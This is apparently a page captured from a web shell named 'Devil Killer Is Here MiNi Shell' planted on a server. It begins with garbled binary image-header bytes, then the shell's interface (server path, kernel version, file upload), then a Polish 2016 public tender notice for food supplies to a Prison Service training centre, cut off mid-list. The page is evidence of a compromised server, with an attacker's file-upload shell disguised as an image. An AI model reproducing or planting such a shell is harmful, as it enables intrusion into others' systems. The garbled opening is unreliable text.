JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160205/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160205/12735-N-2016.html

<p class="kh_header"><b>Popów: Dostawy ogólnych artykułów  spożywczych w  tym  zup, sosów,  wody i soków oraz produktów mącznych  dla OSSW w Kulach Oddział Zamiejscowy w Sulejowie</b><br>
<b>Numer ogłoszenia: 12735 - 2016; data zamieszczenia: 05.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Szkolenia Służby Więziennej w Kulach , Kule 2, 42-110 Popów, woj. śląskie, tel. 034 3104030, faks 034 3103653.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ośrodek Szkolenia Służby Więziennej w Kulach.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy ogólnych artykułów  spożywczych w  tym  zup, sosów,  wody i soków oraz produktów mącznych  dla OSSW w Kulach Oddział Zamiejscowy w Sulejowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia na potrzeby OSSW w Kulach Oddział Zamiejscowy w Sulejowie są dostawy ogólnych artykułów  spożywczych w  tym  zup, sosów,  wody i soków oraz produktów mącznych 
 zadanie  nr 1    - dostawy artykułów  spożywczych  dla OSSW w Kulach Oddział Zamiejscowy w Sulejowie 1 Groch łuskany połówki kg 80 2 Fasola biała Jaś kg 100 3 Grzyby suszone kg 3 4 Rodzynki kg 5 5 Pasztet drobiowy kg 91 6 Konserwa mięsna kg 65 7 Ogórek kiszony kg 60 8 Przecier ogórkowy kg 50 9 Szczaw konserwowy kg 60 10 Koncentrat buraczany l 10 11 Seler konserwowy łagodny kg 50 12 Pieczarki marynowane kg 20 13 Kapusta kiszona kg 700 14 Groszek konserwowy kg 30 15 Kukurydza konserwowa kg 30 16 Chrzan tarty kg 5 17 Koncentrat pomidorowy kg 150 18 Fasola konserwowa czerwona kg 40 19 Ogórek konserwowy kg 300 20 Papryka konserwowa kg 300 21 Sałatka szwedzka kg 150 22 Sałatka wielowarzywna kg 150 23 Sałatka obiadowa kg 150 24 Kapusta czerwona konserwowa kg 150 25 Sałatka z buraczków kg 150 26 Ćwikła z chrzanem kg 50 27 Jabłka prażone kg 60 28 Galaretka kg 30 29 Dżem niskosłodzony kg 300 30 Ananas w syropie kg 60 31 Brzoskwinie w syropie kg 60 32 Śliwki suszone kalifornijskie kg 5 33 Olej roślinny popularny l 600 34 Budyń kg 30 35 Ryż paraboliczny kg 120 36 Ryż biały kg 70 37 Mąka pszenna kg 150 38 Kasza jęczmienna pęczak kg 150 39 Kasza jęczmienna kg 50 40 Kasza gryczana kg 150 41 Kasza manna kg 10 42 Płatki czekoladowe kg 150 43 Płatki kukurydziane kg 120 44 Syrop owocowy l 10 45 Mąka ziemniaczana kg 30 46 Żelatyna spożywcza kg 2 47 Kwasek cytrynowy kg 1 48 Ciastka kruche kg 10 49 Groszek ptysiowy kg 30 50 Rogal z nadzieniem kg 60 51 Paluszki solone kg 2 52 Grzanki kg 30 53 Herbatniki kg 10 54 Cukier waniliowy kg 1 55 Cukier kg 1000 56 Miód porcjowany kg 30 57 Napój kakaowy kg 24 58 Krem czekoladowy kg 30 59 Wafelek w czekoladzie szt. 1500 60 Makaron gruby kg 400 61 Makaron nitki kg 70 62 Zacierki kg 10 63 Kawa rozpuszczalna kg 10 64 Kawa naturalna kg 10 65 Herbata expresowa kg 100 66 Herbata expresowa (b.s.) kg 10 67 Liść laurowy kg 1 68 Majeranek kg 3 69 Papryka mielona słodka kg 1 70 Ziele angielskie kg 1 71 Przyprawa curry kg 1 72 Czosnek granulowany kg 1 73 Kurkuma kg 1 74 Ocet spirytus. 10% l 20 75 Ketchup kg 150 76 Musztarda delikatesowa stołowa kg 100 77 Przyprawa do potraw uniwersalna kg 100 78 Delikata do ryb kg 2 79 Delikata do kurczaka kg 5 80 Przyprawa do karczku kg 4 81 Przyprawa do wołowiny kg 2 82 Majonez dekoracyjny l 160 83 Gałka muszkatołowa kg 1 84 Cynamon kg 1 85 Pieprz czarny mielony kg 3 86 Pieprz czarny cały kg 3 87 Pieprz ziołowy kg 2 88 Sól jodowana kg 200 89 Imbir kg 1 90 Żurek w płynie l 80 91 Przyprawa do zup w płynie uniwersalna kg 200 
 zadanie nr 2  - dostawy  zup i sosów dla OSSW  w Kulach Oddział Zamiejscowy w Sulejowie  1 Sosy sałatkowe kg 5 2 Sos z zielonym pieprzem kg 8 3 Sos do makaronu Carbonara kg 15 4 Sos do makaronu Bolognese kg 20 5 Sos biały baza kg 20 6 Barszcz biały kg 10 7 Zupa pieczarkowa kg 15 8 Zupa porowa kg 15 9 Zupa brokułowa kg 15 10 Zupa cebulowa kg 10 11 Krem z borowików kg 15 12 Bulion drobiowy kg 10 13 Bulion wołowy kg 10 
 zadanie  nr 3  - dostawy wody i soków dla OSSW w Kulach Oddział Zamiejscowy w Sulejowie 1 Naturalna woda mineralna niegazowana / gazowana 0,50 litra litr 500 2 Naturalna woda mineralna niegazowana/gazowana 1,50 litra litr 1500 3 Naturalna woda mineralna niegazowana 5 litrów litr 2000 4 Napoje owocowe litr 300 5 Sok owocowy 200 ml litr 100
 zadanie  nr 4    - dostawy produktów mącznych dla OSSW w Kulach Oddział Zamiejscowy w Sulejowie 1 Pierogi kg 400 2 Kopytka - kluski ziemniaczane kg 100 3 Krokiety kg 200 4 Naleśniki kg 400 5 Kluski śląskie kg 100 6 Kartacze kg 100 7 Kartacze z mięsem kg 200 8 Pyzy z mięsem kg 150 9 Knedle kg 100.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 15.80.00.00-6, 15.33.00.00-0, 15.60.00.00-4, 15.87.12.00-6, 15.89.14.00-4, 15.32.10.00-4, 15.98.10.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Prawo Zamówień Publicznych (Dz. u. 2015r. poz. 2164), zwanej dalej ustawą.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany formularz ofertowy stanowiący załącznik nr 1 do SIWZ. 
Wypełniony i podpisany formularz cenowy w zakresie zadań od 1 do 4 stanowiący załącznik nr 2 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - najkrótszy czas wymiany wadliwego towaru - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego, dział kwatermistrzowski pok. nr 1 i 3..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2016 godzina 10:00, miejsce: w siedzibie zamawiającego Ośrodek Szkolenia Służby Więziennej w Kulach Kule 2, 42-110 Popów Pokój nr 3 sekretariat pawilon Liswarta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy artykułów  spożywczych  dla OSSW w Kulach Oddział Zamiejscowy w Sulejowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Groch łuskany połówki Op.jedn.400g-1kg. Bez obcych zapachów , szkodników i uszkodzeń mechanicznych. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 80 2 Fasola biała Jaś Surowiec krajowy. Op. Jedn. 400g -1kg. Bez obcych zapachów , szkodników i uszkodzeń mechanicznych. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 100 3 Grzyby suszone Podgrzybek, kapelusze całe, zdrowe, bez zanieczyszczeń organicznych, smak i zapach charakterystyczny dla grzybów suszonych. Opakowanie jednostkowe: folia spożywcza, waga ok. 100 g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 3 4 Rodzynki Zdrowe, całe, nieuszkodzone, owalne, spłaszczone jagody o pomarszczonej powierzchni, średniej wielkości o brązowej barwie, właściwym zapachu charakterystycznym dla suszonych winogron bez zapachów obcych. Smak słodki, z charakterystycznym posmakiem, bez posmaków zgorzknienia. Masa netto 100g. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. kg 5 5 Pasztet drobiowy Op. Jedn. ok.130g. Pasztet z drobiu w foremce aluminiowej zamkniętej aluminiowym wieczkiem, poddany procesowi sterylizacji. (wyklucza się puszki i słoiki). Skład chemiczny : białko - 7,3g,Tłuszcz całkowity 17,6 g, węglowodany 5,2 g. wartość energetyczna 208 kcal. Skład: mięso drobiowe, podroby, tłuszcz , jaja, kasza manna. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 91 6 Konserwa mięsna Op. Jedn. 100-135g. Konserwa mięsna w foremce aluminiowej zamknięta platynką poddana procesowi sterylizacji ( wyklucza się puszki i słoiki). Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 65 7 Ogórek kiszony Op. jedn. 900ml. Masa netto nie mniej niż 870g, po odcieku nie mniej niż 450g. Skład: ogórki, naturalna zalewa, przyprawy . Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. kg 60 8 Przecier ogórkowy Skład: ogórki kwaszone przetarte, przyprawy. Produkt pasteryzowany. Op. Jedn. 320-350ml, Masa netto nie mniej niż 280g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 50 9 Szczaw konserwowy Szczaw konserwowy pasteryzowany. Skład: liść szczawiu, przyprawy smakowe. Op. Jedn. 320ml -350ml. Masa netto nie mniej niż 280g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 60 10 Koncentrat buraczany Koncentrat barszczu czerwonego . Skład: woda, zagęszczony sok z buraków ćwikłowych nie mniej niż 12%, cukier, sól, przyprawy. Produkt pasteryzowany. Op. Jedn. 330 - 400ml. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. l 10 11 Seler konserwowy łagodny Skład: seler, woda, ocet, cukier, sól. Op. Jedn. nie mniej niż 370 ml. Masa netto 320g, po odcieku nie mniej niż 160g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. kg 50 12 Pieczarki marynowane Skład: pieczarki całe, cebula, marchew, woda, ocet, cukier, sól, przyprawy smakowe . Produkt pasteryzowany. Op. Jedn. nie mniej niż 880g. Masa po odcieku 550g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. kg 20 13 Kapusta kiszona Op. Jedn. folia 900g -1100g. Skład: kapusta, marchew, przyprawy. Po odcieku nie mniej niż 850g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. kg 700 14 Groszek konserwowy Skład: groszek, woda, sól. Opakowanie jednostkowe - puszka. Waga ok. 400 g. Klasa I. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. kg 30 15 Kukurydza konserwowa Kukurydza konserwowa. Skład: kukurydza - ziarno, woda, cukier, sól. Op. jedn. 400-500g, po odcieku nie mniej niż 220g. Klasa I. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. kg 30 16 Chrzan tarty Skład: korzeń chrzanu nie mniej niż 51%, woda, proszek jajeczny, mleko w proszku, olej roślinny, ocet spirytusowy, cukier, sól, Op. Jedn. nie mniej niż 180g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. kg 5 17 Koncentrat pomidorowy Koncentrat pomid.30% wyprodukowany ze świeżych pomidorów, bez żadnych dodatków, bez konserwantów. Za równoważny uważa się koncentrat gęsty nie zmieniający swojej barwy i smaku . Op. Jedn. 180-500g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. kg 150 18 Fasola konserwowa czerwona Skład: fasola czerwona, woda, sól. Zawartość fasoli bez zalewy 55%. Opakowanie jednostkowe - puszka. Waga nie mniej niż 380 g, waga po odcieku ok. 240 g. Klasa I. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 40 19 Ogórek konserwowy Skład: ogórki, woda, ocet spirytusowy, cukier, sól, przyprawy aromatyczno - smakowe. Op. Jedn. 900ml. Masa netto nie mniej niż 870g, po odcieku nie mniej niż 450g . Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. kg 300 20 Papryka konserwowa Skład: Papryka słodka, zalewa octowa, przyprawy. Op. jedn. 900ml. Masa netto nie mniej niż 870g. Po odcieku nie mniej niż 350g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. kg 300 21 Sałatka szwedzka Skład: ogórki, cukier, ocet, sól, ogórki frezowane, Opakowanie jednostkowe - słoik szklany. Waga ok. 900 g, waga po odcieku ok. 730 g. Klasa I. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. kg 150 22 Sałatka wielowarzywna Skład: kapusta, marchew, papryka, cebula, cukier, ocet, sól. Opakowanie jednostkowe - słoik szklany. Waga ok. 900 g, waga po odcieku ok. 730 g. Klasa I. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. kg 150 23 Sałatka obiadowa Skład: pomidor zielony, ogórek, marchew, papryka, cebula, cukier, ocet, sól. Opakowanie jednostkowe - słoik szklany. Waga ok. 900 g, waga po odcieku ok. 730 g. Klasa I. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. kg 150 24 Kapusta czerwona konserwowa Skład: kapusta czerwona szatkowana, cukier, ocet, sól. Opakowanie jednostkowe - słoik szklany. Waga ok. 900 g, waga po odcieku ok. 730 g. Klasa I. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. kg 150 25 Sałatka z buraczków Skład: buraki, papryka, cebula, olej, cukier, ocet, sól, przyprawy. Opakowanie jednostkowe - słoik szklany. Waga ok. 500 g, waga po odcieku ok. 450g. Klasa I. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. kg 150 26 Ćwikła z chrzanem Skład: buraki ćwikłowe tarte, chrzan, cukier, ocet, Opakowanie jednostkowe - słoik szklany. Waga ok. 280 g. Klasa I. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. kg 50 27 Jabłka prażone Skład: jabłko - mała kostka, cukier, kwasek cytrynowy - regulator kwasowości. Opakowanie jednostkowe - słoik szklany. Waga ok. 900 g. Klasa I. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. kg 60 28 Galaretka Galaretka o smaku truskawkowym, skład: cukier, żelatyna wieprzowa, regulator kwasowości, aromat i barwnik. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 30 29 Dżem niskosłodzony Dżemy o smakach: brzoskwiniowy, truskawkowy, wiśniowy, z kawałkami owoców. Skład: owoce, cukier, substancja żelująca. Łączna zawartość cukru: nie mniej niż 36g na 100g produktu. Op. Jedn. słoik 280-330g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. kg 300 30 Ananas w syropie Krążki ananasa, woda, cukier; opakowanie puszka. Waga ok. 500g -600g, waga po odcieku ok. 340 g. Klasa I. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. kg 60 31 Brzoskwinie w syropie Połówki brzoskwiń w gęstym syropie (woda, cukier). Opakowanie jednostkowe - puszka. Waga ok. 800 g - 900 g, waga po odcieku ok. 470 g. Klasa I. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy. kg 60 32 Śliwki suszone kalifornijskie Śliwki suszone bez pestek półsuche konserwowane kwasem sorbowym. Op. jedn. 150 - 500g. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy kg 5 33 Olej roślinny popularny Olej uniwersalny dopuszczony do żywności, zastosowania: do smażenia, pieczenia, sosów, sałatek, surówek. Skład: Mieszanka olejów: słonecznikowy, rzepakowego, bez zapachów obcych. Op. Jedn. 0,9 - 1 l. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. l 600 34 Budyń Budyń śmietankowy, skład: skrobia ziemniaczana, kukurydziana, aromat, barwnik. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. kg 30 35 Ryż paraboliczny Ryż paraboliczny długoziarnisty, parzony. Cechy dyskwalifikujące: obce zapachy, posmaki, zanieczyszczenia, objawy pleśnienia, 